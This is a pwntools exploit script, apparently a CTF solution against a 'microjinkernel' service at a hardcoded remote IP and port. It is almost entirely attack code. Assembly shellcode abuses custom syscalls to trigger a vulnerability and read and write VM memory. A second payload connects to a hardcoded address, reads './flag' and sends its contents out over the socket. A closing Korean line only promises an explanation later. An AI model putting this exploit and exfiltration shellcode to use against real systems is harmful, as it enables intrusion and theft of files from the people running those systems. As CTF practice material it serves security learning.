Exploit Code:
from pwn import * context(arch='amd64', os='linux', log_level='debug') #p = process('./microjinkernel', aslr=True) p = remote('52.78.196.197', 7483) shellcode = ''' lea r8, [rip+0x1f9] lea r9, [rip+0x210] lea r11, [rip+0x227] mov rbp, rsp sub rsp, 0x208 mov rdi, r8 mov rsi, 0x10 call cus_open mov rdi, r9 mov rsi, 0x10 call cus_open mov rdi, 0 mov rsi, 0xf call cus_init mov rdi, 1 mov rsi, 0x1000 call cus_init mov rdi, 1 call cus_close mov r10, 0x11017e8 mov QWORD PTR [r10], 1 add r10, 8 mov QWORD PTR [r10], 0x38273 add r10, 8 mov QWORD PTR [r10], 1 mov rdi, 0x1100000 mov rsi, 0xff call cus_vuln mov rdi, 0xffffffff00000000 mov rsi, 0x20 mov rdx, 0x18 mov rcx, 0x1100000 call cus_write_vm mov r10, 0x1100000 sub QWORD PTR [r10], 0x360 sub QWORD PTR [r10+0x10], 0x3e50 add QWORD PTR [r10+0x10], 0xcd70 mov rsi, QWORD PTR [r10] sub rsi, QWORD PTR [r10+0x10] add rsi, 0x1f6b mov rdi, 0xffffffff00000000 mov rdx, 0x600 mov rcx, r11 call cus_read_vm cus_open: mov rax, 0x10001 syscall ret cus_init: mov rax, 0x10002 syscall ret cus_close: mov rax, 0x10003 syscall ret cus_read_vm: mov rax, 0x10004 syscall ret cus_write_vm: mov rax, 0x10005 syscall ret read_or_write: mov rax, 0x10006 syscall ret cus_vuln: mov rax, 0x10007 syscall ret ''' # open socket, connect, open flag, read flag, write socket shellcode2 = ''' mov rdi, 2 mov rsi, 1 mov rdx, 0 mov rax, 0x29 syscall mov r8, rax mov rdi, rax mov rdx, 0x10 mov rax, 0 push rax mov rax, 0xe296260e401f0002 push rax mov rsi, rsp mov rax, 0x2a syscall mov rax, 0x67616c662f2e push rax mov rdi, rsp xor rsi, rsi xor rdx, rdx mov rax, 2 syscall mov rdi, rax mov rsi, rsp sub rsi, 0x70 mov rdx, 0x70 mov rax, 0x0 syscall mov rdi, r8 mov rax, 0x1 syscall ''' shellcode = asm(shellcode) shellcode2 = asm(shellcode2) shellcode = shellcode.ljust(0x200, "\x90") payload = '/tmp/test' + "\x00"*21 + '/tmp/booo' + "\x00"*21 + '\x90'*0x105 + shellcode2 + '\x90'*0x100 payload = payload.ljust(0x100, "\x00") shellcode = shellcode + payload shellcode = shellcode.ljust(0x1000, "\x00") pause() p.sendafter('code > ', shellcode) p.interactive()
설명 추후 추가 예정